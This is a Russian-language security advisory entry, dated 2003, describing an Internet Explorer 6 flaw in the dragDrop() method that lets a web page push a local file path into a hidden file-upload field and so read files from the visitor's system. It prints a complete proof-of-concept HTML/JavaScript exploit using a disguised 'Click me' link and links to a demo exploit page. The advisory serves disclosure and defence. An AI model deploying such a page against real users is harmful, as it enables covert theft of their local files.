Дата публикации: | 06.02.2003 |
Дата изменения: | 16.10.2006 |
Всего просмотров: | 1432 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный пользователь может создать злонамеренный код, который произведет перетаскивание произвольного HTML.
Уязвимость обнаружена в dragDrop() методе. Согласно сообщению, удаленный пользователь может создать злонамеренный HMTL код, который заставит пользователя загрузить произвольный текст в HTML upload управление. В результате удаленный пользователь может читать произвольные файлы на системе пользователя. Пример: <head> <script language="javascript"> function handleOnmousedown() { top.moveBy(1,0) document.all.target.style.left = 10; window.setTimeout("top.moveBy(-1,0)", 5); document.all.source.dragDrop(); } function handleDragstart() { window.event.dataTransfer.setData("text", "c:\\jelmer.txt") } </script> <style> .fakelink { color: Blue; cursor: hand; text-decoration: underline; } #target {position: absolute; left: -300px; z-index: 1;} </style> </head> <body> <span id="source" class="fakelink" onmousedown="handleOnmousedown()" ondragstart="handleDragstart()">Click me</span> <input id="target" type="file"> </body>Демонстрационный эксплоит можно посмотреть здесь: http://kuperus.xs4all.nl/security/ie/xfiles.htm Уязвимость проверена в IE 6 sp1 + все исправления |
Ссылки: | internet explorer local file reading |